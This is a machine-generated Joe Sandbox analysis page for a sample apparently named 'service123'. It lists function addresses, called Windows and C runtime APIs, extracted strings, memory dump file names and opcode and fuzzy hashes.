Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID: @J:l
API String ID: 3396830738-2800778301
Opcode ID: cd1cc47ef9b0384a9b2e4dddc5c9f5a14b4d1cfec53850232a0c341f095dead3
Instruction ID: 46c4661740b5513caec551b74780b06f7363643e6e36fa8540e11acac508b5ac
Opcode Fuzzy Hash: cd1cc47ef9b0384a9b2e4dddc5c9f5a14b4d1cfec53850232a0c341f095dead3
Instruction Fuzzy Hash: BD5147B4A05A108FCB00EF28C09875DFBF5BF49304F4185ADE885AF321CB35A809CB82

Function 6C2CF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2CF85F
ReleaseSemaphore.KERNEL32 ref: 6C2CF8E3

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: dfa0fd07f4a065307309d05c33d6f8c1782ff4549f69cf17c49f172320ceb865
Instruction ID: e280d4a2df0ce2a9373a1ea8d17fce6910ddb11ab966b92f4fa1c095bcd15e0d
Opcode Fuzzy Hash: dfa0fd07f4a065307309d05c33d6f8c1782ff4549f69cf17c49f172320ceb865
Instruction Fuzzy Hash: 53314770B093058FDBA0DF29C5887877BF8BB4A329F15865EE85847381D3359949CB92

Function 6C2CFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2CFCEC
ReleaseSemaphore.KERNEL32 ref: 6C2CFD7C
CreateSemaphoreW.KERNEL32 ref: 6C2CFDC7
WaitForSingleObject.KERNEL32 ref: 6C2CFE10

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 62c9ffc286d4246e44a469676edf0dd714968a7243fc171e7aa7e5d243a16b81
Instruction ID: 17f4f4b326e8f1a6beb011a1413d4b602fd184bdc190491e6047ec00ef6816b4
Opcode Fuzzy Hash: 62c9ffc286d4246e44a469676edf0dd714968a7243fc171e7aa7e5d243a16b81
Instruction Fuzzy Hash: 85312A747053058FDBA0EF29C5487877BF9BB0B319F118259E9588B382D735D849CB92

Function 6C388520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C388535
strlen.MSVCRT ref: 6C388583
memcpy.MSVCRT ref: 6C3885A0
setlocale.MSVCRT ref: 6C3885B4
setlocale.MSVCRT ref: 6C3885EA

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: e84dcdf86eb1a256a5617f0003fc1a1dbf99fedb7ea541363397f6ac8baeffe9
Instruction ID: 2385aed40f508f19eaf28f019bf3b3222776be0e261e7697d88da5f553768688
Opcode Fuzzy Hash: e84dcdf86eb1a256a5617f0003fc1a1dbf99fedb7ea541363397f6ac8baeffe9
Instruction Fuzzy Hash: 8F21CFB56093549FD340EF69D48069EBBE0EF88658F45896EE9C887701E738D9448F82

Function 6C2D9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C2D9549
_unlock.MSVCRT ref: 6C2D9571
calloc.MSVCRT ref: 6C2D95BF

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 0348e166155f72d496ec66ba20608ab1957cdcae82a05b6f803e63b5854293d6
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: B8116A715142158FD740AF28C490786BBE0AF99344F2686B9E898CF749EF30E854CB92

Function 6C2D0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2D02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2D04DE), ref: 6C2D02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2D04DE), ref: 6C2D0300

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 48a9fd59a9f9eecba4171e2c8aafa4e3b72d2af52784488bb0db37044df861b7
Instruction ID: 85c3d247b08459adc2c8377af6acace0ebf30752605ef9f8a48626f24c9c5452
Opcode Fuzzy Hash: 48a9fd59a9f9eecba4171e2c8aafa4e3b72d2af52784488bb0db37044df861b7
Instruction Fuzzy Hash: E4F09AB05093058BCB907F28C40839E7AB4BF06328F414A5DE8A987AA1E7389008CF92

Function 6C35B990 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

48l, xrefs: 6C394FDC, 6C395363, 6C39537B
H9l, xrefs: 6C395240
T9l, xrefs: 6C3951F8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: H9l$T9l$48l
API String ID: 0-3232556447
Opcode ID: 48820716fe59f921c8cb89f3824764e7e51405ae203bcd3caeeddd5d2ec06fbf
Instruction ID: bc1be341aa78297154e47137e7a6cad7de47765b8b27a3bdf5c03c8ab385672c
Opcode Fuzzy Hash: 48820716fe59f921c8cb89f3824764e7e51405ae203bcd3caeeddd5d2ec06fbf
Instruction Fuzzy Hash: 5CE1C5F0249B588BD781BF34C4805BEBAA1AF4164CF41592CE4C65BF01EB7986899FC7

Function 6C2D52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C2D4D17
(null), xrefs: 6C2D52F7

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 916c5f1808880f6c5d53ebf7fe0094a8b89b12be22c4ff5d868371dff52f0dcd
Instruction ID: 442df4618223b0fd052b9d5144665372ce13a32d4c72f3a16ea58064bc5b732d
Opcode Fuzzy Hash: 916c5f1808880f6c5d53ebf7fe0094a8b89b12be22c4ff5d868371dff52f0dcd
Instruction Fuzzy Hash: 05A18F7160C35A8BD721CF24D09079AB7E1BBA5309F168A2DECD887741D775F90ACB82

Function 006F4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 006F4C27
@, xrefs: 006F4647

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: e9fe699b8eb36a8001c373512becff2f5567f1f9e1e4fd70e7e844f8da8060b1
Instruction ID: 8892aeb86b32fb7ec6b0d0856189d385f6dda1a48f5b06a79b036412cbe5739f
Opcode Fuzzy Hash: e9fe699b8eb36a8001c373512becff2f5567f1f9e1e4fd70e7e844f8da8060b1
Instruction Fuzzy Hash: F9A19E316083598BD7219F24C0903BBBBE3BF85314F148A1DEAD897742DB35D94ADB82

Function 006F1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 006F1C6D
Unknown pseudo relocation protocol version %d., xrefs: 006F1DF3
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 006F1C20

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: b2ea8c5ade5ff8307dc8fe0b2aa81758fd4f2d2b662ddacb3e2592b6dccd55da
Instruction ID: 8b17fdbdab274ea401c41fe5cd4141a7c47af6ab9a0328056ecb98af0bec5f5a
Opcode Fuzzy Hash: b2ea8c5ade5ff8307dc8fe0b2aa81758fd4f2d2b662ddacb3e2592b6dccd55da
Instruction Fuzzy Hash: DE81B371A04209CBDB10DF68D8846B9BBF3FF86380F148529DA98AB355D731E815CB96

Function 6C2CA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 6C2CAB43
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C2CA970
Unknown pseudo relocation bit size %d., xrefs: 6C2CA9BD

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: ab9958a77e8404a179a44f5bc958c7a661d33a2ac59aadb242007a73217d93d5
Instruction ID: 6f90e866fef3f4e16b31b5cfd2c5b492055451e274381ee4b55134c229284020
Opcode Fuzzy Hash: ab9958a77e8404a179a44f5bc958c7a661d33a2ac59aadb242007a73217d93d5
Instruction Fuzzy Hash: 6C719072B1121ECBCB90CF69C98178AB7B4FF45348F158729ED54ABB44D330E8558B92

Function 6C2D9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2D9142
strchr.MSVCRT ref: 6C2D9152
atoi.MSVCRT ref: 6C2D9163

Strings

., xrefs: 6C2D9147

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: fd234ae7d22448dcb9ad8c80205045153a55dc28de1bc4948b7fb47e532d6224
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: ACE086719047114ED7007F38C41835A76D17B50304F86885CE8849B700DB39E4188742

Function 006F80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 006F80F2
strchr.MSVCRT ref: 006F8102
atoi.MSVCRT ref: 006F8113

Strings

., xrefs: 006F80F7

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: e1d0075edb54fa85fe739498fbea43da8c0469bbbf278e098ce8602baff72c5f
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 77E0E6719047064ED740BF34C90736A75D26B51300F458EACD58487346DB7994469756

Function 6C2D9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C2D929F
GetProcAddress.KERNEL32 ref: 6C2D92B3

Strings

SystemFunction036, xrefs: 6C2D92A8
advapi32.dll, xrefs: 6C2D9298

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: ee31d5b2a2133c17ab544b6c5a8b9b98556cefe3e7ceece627ef781a3bc1909e
Instruction ID: 3b689c81c792d57e2af354fffe48a6cb342ae8009b5ee9574aac5cc9e198a15f
Opcode Fuzzy Hash: ee31d5b2a2133c17ab544b6c5a8b9b98556cefe3e7ceece627ef781a3bc1909e
Instruction Fuzzy Hash: B7E04FB18543008BCB00BF78950608ABBF0B60A320F01092EE48697600EB34A425CF9B

Function 6C2D1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C2D14D2

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 02edfbb1de4574448d72c250d77e6a92192346666890aa0dbbc82c2a2b4db0e7
Instruction ID: 7f2823f1099280a0f4b2978f4c270879428474b14397e5c52e1b3734a2762a76
Opcode Fuzzy Hash: 02edfbb1de4574448d72c250d77e6a92192346666890aa0dbbc82c2a2b4db0e7
Instruction Fuzzy Hash: E0220275A087458FD720CF69C48475AFBE1BF98318F12892EE9D997710D774E844CB82

Function 6C359F20 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C359FEC
memset.MSVCRT ref: 6C35A04E

Strings

xO:l0, xrefs: 6C35A200, 6C35A1F4
xO:l0, xrefs: 6C359FF1, 6C35A00D

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memset
String ID: xO:l0$xO:l0
API String ID: 2221118986-2221593753
Opcode ID: 5f4451bafe9322511d1c1ff43e4518310b695a6fd4eaf01dae8f641d21caee10
Instruction ID: 1c7c893b6bed49dae91f0f60f5df3d047f9f9cfdd18f388b2fa7b964a686a68f
Opcode Fuzzy Hash: 5f4451bafe9322511d1c1ff43e4518310b695a6fd4eaf01dae8f641d21caee10
Instruction Fuzzy Hash: 89F169706093058FCB10DF29C580A6AB7F5FF8A318B99865DD8588B710E732E916DFE1

Function 6C2CA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2CA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2DC41C), ref: 6C2CA3E0
free.MSVCRT ref: 6C2CA3EA

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 95b8f74b6a4694a93bfc04cb1027cf539c97a14d188dc83b92ec2d4e6a9a2ad7
Instruction ID: ac5ca56092e2e583cba837a3f5487537c754a7edc7377aae8f648fca9d09fd5b
Opcode Fuzzy Hash: 95b8f74b6a4694a93bfc04cb1027cf539c97a14d188dc83b92ec2d4e6a9a2ad7
Instruction Fuzzy Hash: 9631B07230971ACBD350AF59D48461BBBE1AFC1359F210B2CEDA44BB40D775D4458783

Function 6C315C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C315D74
memchr.MSVCRT ref: 6C315D93

Part of subcall function 6C388520: setlocale.MSVCRT ref: 6C388535

Strings

., xrefs: 6C315D85
-, xrefs: 6C315F72

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 8c6c89bc5cc9ee5a1888965eedadba4e4643c63408c5220f50d9155b4d67fb96
Instruction ID: c9c721e2838ed59505a42b97c7eee44cdae61482f3007d0cab033d4418b10386
Opcode Fuzzy Hash: 8c6c89bc5cc9ee5a1888965eedadba4e4643c63408c5220f50d9155b4d67fb96
Instruction Fuzzy Hash: DED126B19087598FCB04DFA8C08468EBBF1BF48308F15866AE8A4EB751D734D945CF92

Function 6C316080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3161AE
memchr.MSVCRT ref: 6C3161CD

Part of subcall function 6C388520: setlocale.MSVCRT ref: 6C388535

Strings

., xrefs: 6C3161BF
6, xrefs: 6C3163B6

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
